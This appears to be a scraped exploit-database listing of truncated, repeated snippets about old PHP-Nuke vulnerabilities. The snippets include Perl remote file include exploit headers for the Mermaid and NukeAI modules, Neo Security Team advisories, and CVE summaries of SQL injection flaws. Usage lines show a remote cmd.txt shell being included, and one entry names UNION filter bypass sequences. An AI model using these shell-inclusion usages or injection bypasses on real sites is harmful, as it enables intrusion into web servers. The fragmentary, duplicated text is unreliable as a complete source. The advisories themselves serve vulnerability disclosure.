cra.pl.txt

!/usr/bin/perl PHP-Nuke Mermaid Module V1.2 formdisp.php Remote File Include Exploit SiberSavascilar.CoM secuirty - Hacking Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl perl cra.pl http://site.com/ http://site.com/cmd.txt cmd cmd shell example: cmd...

PHP-Nuke News Module Index.PHP SQL注入漏洞

PHP-Nuke News是一款基于PHP-Nuke的一个新闻模块。 PHP-Nuke News不充分过滤用户提交的URI输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Index.PHP'脚本对用户提交的'sid'参数缺少过滤，提交恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息。 PHP-Nuke PHP-Nuke 7.9 PHP-Nuke PHP-Nuke 7.8 PHP-Nuke PHP-Nuke 7.7 PHP-Nuke PHP-Nuke 7.6 PHP-Nuke PHP-Nuke 7.5 PHP-Nuke PHP-Nuke 7.4...

PHP-Nuke Mermaid Module V1.2 (formdisp.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl PHP-Nuke Mermaid Module V1.2 formdisp.php Remote File Include Exploit SiberSavascilar.CoM secuirty - Hacking Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl target cmd shell location cmd shell variable pe...

nst-30.txt

/ -------------------------------------------------------- Neo Security Team NST - Advisory 30 - 2006-11-24 -------------------------------------------------------- Program: PHP-Nuke Homepage: http://www.phpnuke.org Vulnerable Versions: PHP-Nuke sqlfetchrow$db-sqlquery"SELECT title FROM...

PHP-Nuke Mermaid Module V1.2 (formdisp.php) Remote File Include Exploit

No description provided by source. !/usr/bin/perl PHP-Nuke Mermaid Module V1.2 formdisp.php Remote File Include Exploit SiberSavascilar.CoM secuirty - Hacking Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl target cmd shell location cmd shell variable pe...

PHP-Nuke Mermaid Module V1.2 (formdisp.php) Remote File Include Exploit

!/usr/bin/perl PHP-Nuke Mermaid Module V1.2 formdisp.php Remote File Include Exploit SiberSavascilar.CoM secuirty - Hacking Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl target cmd shell location cmd shell variable perl cra.pl http://site.com/...

PHP-Nuke <= 7.9 News module "sid" SQL Injection vulnerabilities

/ -------------------------------------------------------- Neo Security Team NST - Advisory 30 - 2006-11-24 -------------------------------------------------------- Program: PHP-Nuke Homepage: http://www.phpnuke.org Vulnerable Versions: PHP-Nuke = 7.9 Risk: Medium Impact: Medium Risk -==PHP-Nuke ...

PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit

Exploit for unknown platform in category web applications ================================================================ PHP-Nuke NukeAI Module 3b util.php Remote File Include Exploit ================================================================ !/usr/bin/perl...

PHP-Nuke NukeAI Module 3b - 'util.php' Remote File Inclusion

!/usr/bin/perl +------------------------------------------------------------------------------------------- + nukeai beta3 util.php Remote Code Execution Vulnerability +------------------------------------------------------------------------------------------- + Affected Software .: nukeai beta3 ...

CVE-2006-5720

SQL injection vulnerability in modules/journal/search.php in the Journal module in Francisco Burzi PHP-Nuke 7.9 and earlier allows remote attackers to execute arbitrary SQL commands via the forwhat parameter...

CVE-2006-5720

SQL injection vulnerability in modules/journal/search.php in the Journal module in Francisco Burzi PHP-Nuke 7.9 and earlier allows remote attackers to execute arbitrary SQL commands via the forwhat parameter...

CVE-2006-5720

CVE-2006-5720 describes a remote SQL injection in the PHP-Nuke Journal module (files: modules/journal/search.php) where the parameter forwhat can be tainted to inject arbitrary SQL. Affected software: PHP-Nuke 7.9 and earlier. Root cause: improper input handling in the journal search feature lead...

PHP-Nuke <= 7.9 Journal module (search.php) "forwhat" SQL Injection vulnerability

/ -------------------------------------------------------- Neo Security Team NST - Advisory 29 - 2006-10-31 -------------------------------------------------------- Program: PHP-Nuke Homepage: http://www.php.net Vulnerable Versions: PHP-Nuke = 7.9 Risk: Medium Impact: Medium Risk -==PHP-Nuke = 7....

nst-29.txt

------=Part948836292592.1162313436170 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline / -------------------------------------------------------- Neo Security Team NST - Advisory 29 - 2006-10-31...

PHP-Nuke 7.x Journal Module - search.php SQL Injection

PHP-Nuke 7.x Journal Module - search.php SQL Injection source: https://www.securityfocus.com/bid/20829/info The PHP-Nuke Journal module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue...

PHP-Nuke 7.x Journal Module - 'search.php' SQL Injection

source: https://www.securityfocus.com/bid/20829/info The PHP-Nuke Journal module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application,...

PHP-Nuke <= 7.9 Search module "author" SQL Injection vulnerability

/ -------------------------------------------------------- Neo Security Team NST - Advisory 28 - 2006-10-25 -------------------------------------------------------- Program: PHP-Nuke Homepage: http://www.php.net Vulnerable Versions: PHP-Nuke = 7.9 Risk: Medium Impact: Medium Risk -==PHP-Nuke = 7....

CVE-2006-5525

Incomplete blacklist vulnerability in mainfile.php in PHP-Nuke 7.9 and earlier allows remote attackers to conduct SQL injection attacks via 1 "//UNION " or 2 " UNION//" sequences, which are not rejected by the protection mechanism, as demonstrated by a SQL injection via the eid parameter in a...

CVE-2006-5525

PHP-Nuke 7.9 and earlier are affected by an incomplete blacklist in mainfile.php that fails to reject UNION-based SQL injection payloads. The vulnerability can be triggered via the eid parameter in the Encyclopedia module (modules.php) using patterns such as //UNION or UNION/ /. The root cause is...

CVE-2006-5525

Incomplete blacklist vulnerability in mainfile.php in PHP-Nuke 7.9 and earlier allows remote attackers to conduct SQL injection attacks via 1 "//UNION " or 2 " UNION//" sequences, which are not rejected by the protection mechanism, as demonstrated by a SQL injection via the eid parameter in a...